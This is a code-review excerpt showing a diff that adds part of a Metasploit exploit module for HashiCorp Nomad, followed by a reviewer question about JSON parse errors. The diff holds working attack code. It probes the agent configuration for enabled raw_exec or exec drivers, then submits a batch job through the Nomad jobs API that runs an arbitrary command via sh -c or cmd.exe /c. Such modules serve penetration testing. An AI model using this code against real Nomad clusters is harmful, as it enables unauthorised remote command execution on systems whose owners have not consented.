modules/exploits/multi/misc/nomad_exec.rb

```diff
@@ -0,0 +1,195 @@
+      return CheckCode::Safe
+    end
+
+    agent_info = JSON.parse(res.body)
+
+    if agent_info['config']['Plugins']
+      agent_info['config']['Plugins'].each do |plugin|
+        if plugin['Name'] == 'raw_exec' && plugin['Config']['enabled'] == true
+          return CheckCode::Vulnerable
+        end
+      end
+    end
+
+    if agent_info['config']['Client']['Options']['driver.raw_exec.enable'] == 'true' || agent_info['config']['Client']['Options']['driver.raw_exec.enable'] == '1'
+      return CheckCode::Vulnerable
+    end
+
+    if datastore['JOB_TYPE'] == 'raw_exec' && agent_info['config']['Client']['DisableRemoteExec'] == false
+      vprint_status 'raw_exec doesn\'t appear to be supported. Try setting JOB_TYPE to exec instead.'
+      return CheckCode::Appears
+    elsif datastore['JOB_TYPE'] == 'exec' && agent_info['config']['Client']['DisableRemoteExec'] == false
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Safe
+  rescue JSON::ParserError
+    vprint_error 'Failed to parse JSON output.'
+    return CheckCode::Unknown
+  end
+
+  def execute_command(cmd, _opts = {})
+    uri = target_uri.path
+    job_name = datastore['JOB_NAME'] == '' ? Rex::Text.rand_text_alpha(5..10) : datastore['JOB_NAME']
+    print_status("Creating job '#{job_name}'")
+
+    case target.name
+    when /Linux/
+      arg1 = 'sh'
+      arg2 = '-c'
+    when /Windows/
+      arg1 = 'cmd.exe'
+      arg2 = '/c'
+    end
+
+    res = send_request_cgi({
+      'method' => 'PUT',
+      'uri' => normalize_uri(uri, 'v1/jobs'),
+      'headers' => {
+        'X-Nomad-Token' => datastore['ACL_TOKEN']
+      },
+      'ctype' => 'application/json',
+      'data' => {
+        Job: {
+          ID: job_name,
+          Name: job_name,
+          Type: 'batch',
+          Datacenters: [datastore['DATACENTER']],
+          TaskGroups: [
+            {
+              Name: job_name,
+              Count: 1,
+              Tasks: [
+                {
+                  Name: job_name,
+                  Driver: datastore['JOB_TYPE'],
+                  User: '',
+                  Config: {
+                    command: arg1,
+                    args: [
+                      arg2,
+                      cmd.to_s
+                    ]
+                  },
+                  Resources: {
+                    CPU: 500,
+                    MemoryMB: 256
+                  },
+                  LogConfig: {
+                    MaxFiles: 1,
+                    MaxFileSizeMB: 1
+                  }
+                }
+              ],
+              RestartPolicy: {
+                Attempts: 0
+              },
+              EphemeralDisk: {
+                SizeMB: 300
+              }
+            }
+          ]
+        }
+      }.to_json
+    })
+    unless res && res.code == 200
+      fail_with(Failure::UnexpectedReply, 'An error occured when contacting the Nomad API.')
+    end
+
+    job_info = JSON.parse(res.body)
```

Comment:
Similar to the check method, would this need to handle `JSON::ParserError` being raised?